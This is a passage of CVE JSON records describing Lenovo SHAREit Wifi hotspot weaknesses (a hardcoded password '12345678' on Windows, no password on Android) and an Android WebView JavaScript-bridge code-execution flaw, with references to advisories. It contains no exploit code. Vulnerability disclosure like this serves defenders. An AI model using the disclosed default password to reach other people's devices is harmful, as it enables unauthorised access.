"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html"
},
{
"name": "https://support.lenovo.com/us/en/product_security/len_4058",
"refsource": "CONFIRM",
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"name": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities",
"refsource": "MISC",
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2016/Jan/67"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-1489",
"datePublished": "2016-01-26T19:00:00.000Z",
"dateReserved": "2016-01-04T00:00:00.000Z",
"dateUpdated": "2024-08-05T22:55:14.886Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2016-1491 (GCVE-0-2016-1491)
Vulnerability from cvelistv5 – Published: 2016-01-26 19:00 – Updated: 2024-08-05 22:55- n/a
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T22:55:14.707Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2016/Jan/67"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-01-25T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "The Wifi hotspot in Lenovo SHAREit before 3.2.0 for Windows, when configured to receive files, has a hardcoded password of 12345678, which makes it easier for remote attackers to obtain access by leveraging a position within the WLAN coverage area."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-09T18:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2016/Jan/67"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-1491",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The Wifi hotspot in Lenovo SHAREit before 3.2.0 for Windows, when configured to receive files, has a hardcoded password of 12345678, which makes it easier for remote attackers to obtain access by leveraging a position within the WLAN coverage area."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html"
},
{
"name": "https://support.lenovo.com/us/en/product_security/len_4058",
"refsource": "CONFIRM",
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"name": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities",
"refsource": "MISC",
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2016/Jan/67"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-1491",
"datePublished": "2016-01-26T19:00:00.000Z",
"dateReserved": "2016-01-04T00:00:00.000Z",
"dateUpdated": "2024-08-05T22:55:14.707Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2016-1492 (GCVE-0-2016-1492)
Vulnerability from cvelistv5 – Published: 2016-01-26 19:00 – Updated: 2024-08-05 22:55- n/a
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T22:55:14.636Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ",
"x_transferred"
],
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC",
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2016/Jan/67"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2016-01-25T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "The Wifi hotspot in Lenovo SHAREit before 3.5.48_ww for Android, when configured to receive files, does not require a password, which makes it easier for remote attackers to obtain access by leveraging a position within the WLAN coverage area."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2018-10-09T18:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_BUGTRAQ"
],
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"tags": [
"mailing-list",
"x_refsource_FULLDISC"
],
"url": "http://seclists.org/fulldisclosure/2016/Jan/67"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2016-1492",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The Wifi hotspot in Lenovo SHAREit before 3.5.48_ww for Android, when configured to receive files, does not require a password, which makes it easier for remote attackers to obtain access by leveraging a position within the WLAN coverage area."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html",
"refsource": "MISC",
"url": "http://packetstormsecurity.com/files/135378/Lenovo-ShareIT-Information-Disclosure-Hardcoded-Password.html"
},
{
"name": "https://support.lenovo.com/us/en/product_security/len_4058",
"refsource": "CONFIRM",
"url": "https://support.lenovo.com/us/en/product_security/len_4058"
},
{
"name": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities",
"refsource": "MISC",
"url": "http://www.coresecurity.com/advisories/lenovo-shareit-multiple-vulnerabilities"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"refsource": "BUGTRAQ",
"url": "http://www.securityfocus.com/archive/1/537365/100/0/threaded"
},
{
"name": "20160125 [CORE-2016-0002] - Lenovo ShareIT Multiple Vulnerabilities",
"refsource": "FULLDISC",
"url": "http://seclists.org/fulldisclosure/2016/Jan/67"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2016-1492",
"datePublished": "2016-01-26T19:00:00.000Z",
"dateReserved": "2016-01-04T00:00:00.000Z",
"dateUpdated": "2024-08-05T22:55:14.636Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2014-1939 (GCVE-0-2014-1939)
Vulnerability from cvelistv5 – Published: 2014-03-03 02:00 – Updated: 2024-08-06 09:58- n/a
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-06T09:58:15.988Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "http://blog.chromium.org/2013/11/introducing-chromium-powered-android.html"
},
{
"name": "[oss-security] 20140210 CVE-2014-1939 searchBoxJavaBridge_ in Android Jelly Bean",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "http://openwall.com/lists/oss-security/2014/02/11/2"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://support.lenovo.com/us/en/product_security/len_6421"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"datePublic": "2014-02-08T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "java/android/webkit/BrowserFrame.java in Android before 4.4 uses the addJavascriptInterface API in conjunction with creating an object of the SearchBoxImpl class, which allows attackers to execute arbitrary Java code by leveraging access to the searchBoxJavaBridge_ interface at certain Android API levels."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2016-05-23T18:57:01.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "http://blog.chromium.org/2013/11/introducing-chromium-powered-android.html"
},
{
"name": "[oss-security] 20140210 CVE-2014-1939 searchBoxJavaBridge_ in Android Jelly Bean",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "http://openwall.com/lists/oss-security/2014/02/11/2"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://support.lenovo.com/us/en/product_security/len_6421"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2014-1939",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "java/android/webkit/BrowserFrame.java in Android before 4.4 uses the addJavascriptInterface API in conjunction with creating an object of the SearchBoxImpl class, which allows attackers to execute arbitrary Java code by leveraging access to the searchBoxJavaBridge_ interface at certain Android API levels."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "http://blog.chromium.org/2013/11/introducing-chromium-powered-android.html",
"refsource": "CONFIRM",
"url": "http://blog.chromium.org/2013/11/introducing-chromium-powered-android.html"
},
{
"name": "[oss-security] 20140210 CVE-2014-1939 searchBoxJavaBridge_ in Android Jelly Bean",
"refsource": "MLIST",
"url": "http://openwall.com/lists/oss-security/2014/02/11/2"
},
{
"name": "https://support.lenovo.com/us/en/product_security/len_6421",
"refsource": "CONFIRM",
"url": "https://support.lenovo.com/us/en/product_security/len_6421"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2014-1939",
"datePublished": "2014-03-03T02:00:00.000Z",
"dateReserved": "2014-02-10T00:00:00.000Z",
"dateUpdated": "2024-08-06T09:58:15.988Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}